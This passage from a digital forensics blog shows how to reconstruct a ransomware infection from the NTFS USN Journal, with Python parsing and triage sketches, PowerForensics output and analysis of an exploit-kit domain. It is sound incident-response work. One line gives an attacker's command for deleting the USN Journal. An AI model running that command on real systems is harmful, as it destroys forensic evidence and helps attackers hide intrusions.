  DWORD         SourceInfo;
  DWORD         SecurityId;
  DWORD         FileAttributes;
  WORD          FileNameLength;
  WORD          FileNameOffset;
  WCHAR         FileName[1];
} USN_RECORD_V2;

There are several important fields here, namely FileName, Reason, Usn, TimeStamp, and FileReferenceNumber.
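To make the layout concrete, here is a minimal Python sketch (standard library only) that parses a version 2 USN record from raw bytes. The byte buffer in the example is synthetic, built with hypothetical values rather than real journal data:

```python
import struct

# Fixed-size portion of a USN_RECORD_V2: little-endian, no padding.
# DWORD/WORD/DWORDLONG map to I/H/Q; Usn and TimeStamp are 64-bit signed.
_V2_HEADER = '<IHHQQqqIIIIHH'  # 60 bytes

def parse_usn_record_v2(buf, offset=0):
    (record_length, major, minor, file_ref, parent_ref, usn,
     timestamp, reason, source_info, security_id, file_attrs,
     name_length, name_offset) = struct.unpack_from(_V2_HEADER, buf, offset)
    # FileName is UTF-16LE and sits name_offset bytes into the record.
    start = offset + name_offset
    return {
        'RecordLength': record_length,
        'MajorVersion': major,
        'FileReferenceNumber': file_ref,
        'ParentFileReferenceNumber': parent_ref,
        'Usn': usn,
        'TimeStampRaw': timestamp,  # FILETIME: 100-ns ticks since 1601-01-01
        'Reason': reason,
        'FileName': buf[start:start + name_length].decode('utf-16-le'),
    }

# Synthetic example record carrying the hypothetical name "evil.exe".
_name = 'evil.exe'.encode('utf-16-le')
_buf = struct.pack(_V2_HEADER, 60 + len(_name), 2, 0, 1234, 5678,
                   4743722112, 0, 0x100, 0, 0, 0x20, len(_name), 60) + _name
example = parse_usn_record_v2(_buf)
```

In practice you would rarely hand-parse the journal (Get-ForensicUsnJrnl does this for you), but seeing the fields unpacked one by one makes the output listings later in this post easier to read.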

The Reason field records a combination of flags corresponding to 20+ possible NTFS operations, such as FILE_CREATE, FILE_DELETE, DATA_EXTEND, DATA_OVERWRITE, RENAME_NEW_NAME, and CLOSE.
These operations are fairly self-explanatory.

The USN Journal is of value to our analysis because browser operations create temporary files when accessing pages, and those temporary files generate Journal entries. This means that even if we lose our firewall/proxy logs and browser history, there may still be a way to identify what actions occurred in the time frame in question.

Note: As with any forensic evidence, the USN Journal can be tampered with; an attacker could theoretically purge it using the following command: fsutil usn deletejournal /d c:
Similarly, CCleaner/PrivaZer/etc. may also clear MFT/USN Journal records. Detecting the presence of those tools may be possible through alternative artifacts such as Amcache or Prefetch files.


Keep one thing in mind - when you are dealing with the USN Journal you will be dealing with hundreds of thousands, if not millions, of records. Determining what happened can be a time-consuming effort, so it is extremely important to narrow your focus down to a very small time frame (possibly an hour or two).

In our scenario, we are dealing with a ransomware infection, which typically leaves a ransom note on the desktop. We can use this to narrow our time frame.

Using PowerForensics (the Get-ForensicFileRecord cmdlet), we can pull out the MFT record for this file:
Master File Table Record Index: 24151
MFT Entry for Index 24151:
FullName             : C:\Users\greg\Desktop\!MADEUPFILENAME.html
Name                 : !MADEUPFILENAME.html
SequenceNumber       : 32
RecordNumber         : 24151
ParentSequenceNumber : 2
ParentRecordNumber   : 22060
Directory            : False
Deleted              : False
ModifiedTime         : 3/12/1601 1:17:27 PM
AccessedTime         : 3/12/1601 1:17:27 PM
ChangedTime          : 6/8/2016 1:27:40 AM
BornTime             : 3/12/1601 1:17:27 PM
FNModifiedTime       : 6/8/2016 1:27:40 AM
FNAccessedTime       : 6/8/2016 1:27:40 AM
FNChangedTime        : 6/8/2016 1:27:40 AM
FNBornTime           : 6/8/2016 1:27:40 AM

There are some discrepancies here between the $FN and $SI timestamps, which may be due to timestamp stomping. However, the $FN attributes accurately reflect an infection time of 6/8/2016 1:27:40 AM UTC (6/7/2016 6:27:40 PM EST), which is roughly when the user asserts they noticed an issue.
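The comparison behind that judgement is simple enough to express in a few lines. The following is an illustrative Python sketch (not part of PowerForensics): $STANDARD_INFORMATION timestamps can be rewritten from user mode (e.g. via SetFileTime), while $FILE_NAME timestamps are maintained by the kernel, so an $SI creation time earlier than the $FN creation time is a classic stomping red flag.

```python
from datetime import datetime, timezone

def looks_timestomped(si_born, fn_born):
    """Flag a record whose $SI creation time predates its $FN creation
    time - a common indicator that the $SI timestamps were stomped."""
    return si_born < fn_born

# The values from the MFT record above: a 1601 $SI BornTime against a
# 2016 $FN BornTime.
si_born = datetime(1601, 3, 12, 13, 17, 27, tzinfo=timezone.utc)
fn_born = datetime(2016, 6, 8, 1, 27, 40, tzinfo=timezone.utc)
suspicious = looks_timestomped(si_born, fn_born)
```

A 1601-era $SI timestamp is an especially blunt tell, since it is the zero point of the Windows FILETIME epoch.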

But this might not be the first instance in which the malware executed, as the ransom note is usually dropped after the file system encryption routine has completed. We know that in our scenario, after each file is encrypted, its extension is changed to .crypz. Consequently, we can also assert that the time of compromise must have been just prior to the first file extension being renamed. We are essentially working backwards through the attack lifecycle.

  1. Ransom Note HTML file dropped
  2. Files encrypted, extension changed
  3. Malicious payload executed
  4. Malicious payload dropped
  5. Exploit kit successful exploitation
  6. Browser instantiates Flash/JS to execute vulnerability
  7. Web page redirect to malicious landing page

So, we can constrain our review of the USN Journal to the time of the first .crypz instance minus 30 minutes, to be safe. It is also useful to grep for specific extensions such as .js, .zip, .exe, .dll, .swf, and .htm that may be involved in the attack lifecycle, to further constrain the data set.
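As a sketch of that triage step, the following Python assumes the journal has been exported to records carrying a TimeStamp datetime and a FileName string (e.g. from Get-ForensicUsnJrnl via Export-Csv), and keeps only the records in the 30-minute window before the first .crypz rename that match the suspect extensions. The sample records below are synthetic ("payload.swf" is a hypothetical name):

```python
from datetime import datetime, timedelta

# Extensions commonly involved in a drive-by/exploit-kit attack lifecycle.
SUSPECT_EXTENSIONS = ('.js', '.zip', '.exe', '.dll', '.swf', '.htm')

def triage_usn_records(records, first_crypz_time, window_minutes=30):
    """Keep records from the window ending at the first .crypz rename,
    restricted to suspect extensions, sorted oldest first."""
    start = first_crypz_time - timedelta(minutes=window_minutes)
    hits = [r for r in records
            if start <= r['TimeStamp'] <= first_crypz_time
            and r['FileName'].lower().endswith(SUSPECT_EXTENSIONS)]
    return sorted(hits, key=lambda r: r['TimeStamp'])

# Synthetic example around the 6/8/2016 1:27 AM infection window.
first_crypz = datetime(2016, 6, 8, 1, 27, 40)
records = [
    {'TimeStamp': datetime(2016, 6, 8, 1, 22, 51), 'FileName': 'dsF5h3S[1].htm'},
    {'TimeStamp': datetime(2016, 6, 8, 1, 23, 5),  'FileName': 'payload.swf'},
    {'TimeStamp': datetime(2016, 6, 7, 23, 0, 0),  'FileName': 'old.exe'},   # outside window
    {'TimeStamp': datetime(2016, 6, 8, 1, 25, 0),  'FileName': 'notes.txt'}, # wrong extension
]
hits = triage_usn_records(records, first_crypz)
```

This cuts a journal of potentially millions of entries down to a handful of candidates you can review by hand.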

Using this technique I was able to identify the following sequence of events:
VolumePath               : \\.\C:
Version                  : 2.0
RecordNumber             : 33080
FileSequenceNumber       : 28
ParentFileRecordNumber   : 206296
ParentFileSequenceNumber : 97
Usn                      : 4743722112
TimeStamp                : 6/8/2016 1:22:51 AM
Reason                   : DATA_EXTEND, FILE_CREATE, CLOSE
SourceInfo               : 0
SecurityId               : 0
FileAttributes           : ARCHIVE, NCI
FileName                 : (REDACTEDWEBPAGE).jpg

VolumePath               : \\.\C:
Version                  : 2.0
RecordNumber             : 33299
FileSequenceNumber       : 209
ParentFileRecordNumber   : 206165
ParentFileSequenceNumber : 763
Usn                      : 4743722424
TimeStamp                : 6/8/2016 1:22:51 AM
Reason                   : FILE_CREATE
SourceInfo               : 0
SecurityId               : 0
FileAttributes           : ARCHIVE, NCI
FileName                 : dsF5h3S[1].htm

VolumePath               : \\.\C:
Version                  : 2.0
RecordNumber             : 33707
FileSequenceNumber       : 106
ParentFileRecordNumber   : 899
ParentFileSequenceNumber : 21
Usn                      : 4743725296
TimeStamp                : 6/8/2016 1:22:51 AM
Reason                   : FILE_CREATE
SourceInfo               : 0
SecurityId               : 0
FileAttributes           : 8208
FileName                 :

VolumePath               : \\.\C:
Version                  : 2.0
RecordNumber             : 33303
FileSequenceNumber       : 620
ParentFileRecordNumber   : 244618
ParentFileSequenceNumber : 3
Usn                      : 4743722896
TimeStamp                : 6/8/2016 1:22:51 AM
Reason                   : FILE_CREATE
SourceInfo               : 0
SecurityId               : 0
FileAttributes           : ARCHIVE, NCI
FileName                 : truck-yield-damage-objection-journey-punish-dizzy-sl


The HTM file was recovered from the file system; when loaded, it redirects to the domain that instantiates the SWF Flash object. The randomized subdomain (as well as the odd TLD '.top') and the randomized SWF file name are both highly suspect.

Not surprisingly, the SWF object was zlib-compressed. After unpacking, it was obviously part of an exploit kit landing page used to exploit some older (2014) browser vulnerabilities. The ransomware variant itself was a much newer iteration at the time.

Virustotal results (almost 6 months later) are somewhat discouraging for this domain:

Registrant information for this domain:
Updated Date: 2016-06-08T00:20:29Z
Creation Date: 2016-06-08T00:09:59Z
Registry Expiry Date: 2017-06-08T00:09:59Z
Sponsoring Registrar: Alpnames Limited
Sponsoring Registrar IANA ID: 1857
Domain Status: clientTransferProhibited
Registrant ID: alp_54912665
Registrant Name: Clive Hoetnez
Registrant Organization: N/A
Registrant Street: N/A
Registrant City: Smallvile
Registrant State/Province: Arkansas
Registrant Postal Code: 43547
Registrant Country: US
Registrant Phone: +1.447898
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email:

6paq is a random temporary email provider.


I didn't want to cover much else in this post. This is only one component of an investigation of this type; there are a number of other artifacts and avenues you would want to pursue to draw broader conclusions about your case. Mostly, my intent was to demonstrate some of the thought process in tackling a fairly common problem with a somewhat creative solution, and to show the importance of that quality in DFIR work. Hopefully you learned something from this post; please feel free to leave comments as usual.

Thursday, October 20, 2016

Computer Security Incident Handling Guide - A presentation based off of the NIST paper

A few years ago, during an interview at Mandiant, I was asked to create a presentation based on the NIST Computer Security Incident Handling Guide, a good primer on incident handling that I would recommend every NetSec professional read.

Although the presentation is light in description, the basic outline remains. If the content interests you I would highly recommend reading the NIST report.